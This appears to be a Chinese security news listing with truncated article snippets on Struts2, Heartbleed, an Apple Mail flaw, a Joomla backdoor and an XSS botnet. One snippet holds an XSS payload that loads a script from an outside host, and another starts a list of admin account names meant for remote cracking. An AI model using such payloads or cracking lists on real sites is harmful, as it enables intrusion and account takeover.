安全研究人员Andreas Kurtz在苹果操作系统的邮件加密方面发现了一个危险的漏洞。Kurtz表示向苹果反映了这个问题,但苹果没有解决这个问题。 上个月,Kurtz发现邮件中附件不受苹果...
网络安全
绿盟科技威胁分析报告:那些年,那些 Apache Struts2 的漏洞
每次 Apache Struts2 漏洞爆发都在互联网上掀起腥风血雨,我们整理了近年来 Apache Struts2 高风险漏洞的信息供大家参考。针对此次 Apache Struts2 的漏洞,绿盟科...
xKungfoo 2014.演讲稿下载
xKungfoo 是XCon组委会组织主办的中国人自己的安全技术讨论会议。xKungfoo专注于现今流行的安全技术话题,以及深入的黑客和防护技术讨论,演讲者与参会者必须为中国人。仅面向国内广大安全技术...
网络安全
由XSS漏洞引发的僵尸网络DDos攻击风暴
写在前面: 本文中的黑客利用XSS控制的僵尸网络进行DDosS攻击,存在漏洞的视频网站,被云安全服务提供商隐去了名字,会是youtube吗?我们不得而知。 正文: 基于应用层的分布式拒绝...
网络安全
HeartBleed漏洞:血淋淋的外表下却是一片祥和
最近Heart bleed漏洞在互联网上掀起了轩然巨波,作为基础安全软件的重大漏洞,影响深远,各大互联网公司、甲方、乙方、白帽子甚至央视...
网络安全
Joomla插件构造函数后门分析
本文介绍我们在Joomla插件中发现的一个有(wei)趣(suo)的后门。 尽管感觉有点不太对劲,不过由于代码组织良好,最开始我们没有意识到里面包含后门。插件的代码如下所示: 乍一看没什么特别的,没有...
XSS测试代码
1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标...
Struts2再曝高危漏洞(S2-020补丁绕过)
之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用!...
[漏洞]openssl漏洞在线检测平台汇总
OpenSSL爆出本年度最严重的安全漏洞,此漏洞在黑客社区被命名为“心脏出血”漏洞。 漏洞危害:利用该漏洞,黑客坐在自己家里电脑前,就可以实时获取https开头网址的用户登录账...
世界各国管理员帐号写法(用于远程破解)
通用帐号administrator 1.日本 運営者 支配人 2.德国 Verwalter Verwaltungsbeamte 3.意大利 addetto responsabile 4.波兰 admi...
